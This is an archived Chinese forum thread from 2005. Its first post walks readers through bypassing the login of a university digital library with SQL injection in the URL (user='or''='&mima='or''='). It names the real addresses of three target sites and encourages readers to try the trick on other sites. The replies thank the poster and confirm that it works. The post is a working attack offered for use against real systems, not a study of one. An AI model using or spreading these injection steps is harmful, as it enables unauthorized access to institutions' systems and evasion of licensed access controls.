版块导航: 正在加载中...

登录注册

应《网络安全法》要求，自2017年10月1日起，未进行实名认证将不得使用互联网跟帖服务。为保障您的帐号能够正常使用，请尽快对帐号进行手机号验证，感谢您的理解与支持！

24小时热门版块排行榜

返回列表

当前主题已经存档。

当前只显示满足指定条件的回帖，点击这里查看本话题的所有回帖

applepie119

木虫 (著名写手)

应助: 0 (幼儿园)
金币: 2997.2
红花: 11
帖子: 1124
在线: 22.1小时
虫号: 90394
注册: 2005-09-01
专业: 临床药理

[交流] [分享]新发现利用asp漏洞进超星图书馆秘技

[分享]新发现利用asp漏洞进超星图书馆秘技
这是在看了论坛上的一个帖子后测试找出来的，特向菜鸟们推荐，
希望对大家有所帮助！
深圳广播电视大学数字图书馆
http://218.17.219.22/bookhtm/index.asp
搜索需要输入用户名、密码
我们可以构造查询条件，突破限制
做法如下：
1.随便输入学号、密码，登陆，例如：学号=1,密码=1.这时会出现“此用户不存在！返回”
ie地址栏中地址为：http://218.17.219.22/bookhtm/sq/ ... ;B1.x=31&B1.y=6
2.修改地址进入：
将上面地址中user=1&mima=1改为:user='or''='&mima='or''='
或者user='or'1'='1&mima='or'1'='1 也可
即：http://218.17.219.22/bookhtm/sq/load.asp?user='or''='&mima='or''='&B1.x=31&B1.y=6
就是登陆地址了。
3.登陆后可以随便看了
同样的道理利用这个漏洞，可以登陆另外几个需要输入用户名、密码的站点,需要输入的地方都输上'or''='
如：驻马店电大：http://www.zmdtvu.net/dabookhtm/
铜陵电大：http://218.22.180.149/index.asp其他的自己好好发掘吧，^_^

回复此楼

» 猜你喜欢

274求调剂已经有11人回复
材料求调剂已经有3人回复
化学工程085602 305分求调剂已经有4人回复
07化学303求调剂已经有4人回复
一志愿河工大 081700 276求调剂已经有3人回复
312求调剂已经有6人回复
321求调剂已经有3人回复
086000生物与医药292求调剂已经有7人回复
085600 材料与化工 329分求调剂已经有5人回复
材料与化工304求B区调剂已经有3人回复

1楼 2005-09-04 12:30:18

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

云行天下

铜虫 (小有名气)

应助: 0 (幼儿园)
金币: 157.7
帖子: 131
在线: 35.4小时
虫号: 76681
注册: 2005-06-25
性别: GG
专业: 急重症医学/创伤/烧伤/整形

0.5

能用，就是资料太少

赞一下

回复此楼

19楼2005-11-02 23:00:49

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

查看全部 33 个回答

onefan

应助: (幼儿园)
在线:
虫号: 49871

0.5

thank you very much!

赞一下

回复此楼

7楼2005-09-10 20:45:41

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

minister6

新虫 (初入文坛)

应助: 0 (幼儿园)
金币: 2.9
帖子: 2
在线: 10分钟
虫号: 62400
注册: 2005-03-16

1

thank you!!!!!!!!

赞一下

回复此楼

9楼2005-10-07 13:20:51

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

查看全部 33 个回答

最具人气热帖推荐 [查看全部]		作者	回/看	最后发表

[考研] 289求调剂 +12	硕星赴 2026-03-23	12/600	2026-03-25 18:41 by Ainin_
[考研] 0854电子信息求调剂 +7	α____ 2026-03-22	9/450	2026-03-25 13:37 by α____
[考研] 材料与化工考研调剂 +9	孅華 2026-03-22	9/450	2026-03-25 13:09 by cmz0325
[考研] 281求调剂 +4	Koxui 2026-03-24	5/250	2026-03-25 11:38 by userper
[考研] 一志愿吉林大学材料与化工303分求调剂 +4	为学666 2026-03-24	4/200	2026-03-25 11:27 by BruceLiu320
[考研] 278求调剂 +4	我可以上岸的对� 2026-03-19	4/200	2026-03-25 11:01 by userper
[考研] 289材料与化工（085600）B区求调剂 +4	这么名字咋样 2026-03-22	5/250	2026-03-25 08:20 by mx.yue
[考研] 311求调剂 +3	冬十三 2026-03-24	3/150	2026-03-24 21:31 by peike
[考研] 321求调剂 +4	Ymlll 2026-03-24	4/200	2026-03-24 14:44 by sprinining
[考研] 277分求调剂，跨调材料 +3	考研调剂lxh 2026-03-24	3/150	2026-03-24 13:52 by JourneyLucky
[考研] 085404电子信息284分求调剂 +4	13659058978 2026-03-24	4/200	2026-03-24 12:15 by syl20081243
[考研] 269求调剂 +4	我想读研11 2026-03-23	4/200	2026-03-23 21:25 by pswait
[考研] 一志愿武理材料工程348求调剂 +6	￣^￣゜汗 2026-03-19	9/450	2026-03-23 19:53 by pswait
[考研] 一志愿070300浙大化学358分，求调剂！ +4	酥酥鱼.. 2026-03-21	4/200	2026-03-23 08:12 by Iveryant
[考研] 生物学调剂 +5	Surekei 2026-03-21	5/250	2026-03-22 14:39 by tcx007
[考研] 一志愿北京化工大学070300 学硕336求调剂 +5	vv迷 2026-03-21	8/400	2026-03-22 14:20 by ColorlessPI
[考研] 303求调剂 +5	安忆灵 2026-03-22	6/300	2026-03-22 12:46 by 素颜倾城1988
[基金申请] 山东省面上项目限额评审 +4	石瑞0426 2026-03-19	4/200	2026-03-22 08:50 by Wei_ren
[考研] 297求调剂 +3	喜欢还是不甘心 2026-03-20	3/150	2026-03-21 18:33 by 学员8dgXkO
[考研] 一志愿西安交通大学学硕 354求调剂211或者双一流 +3	我想要读研究生 2026-03-20	3/150	2026-03-20 20:13 by JourneyLucky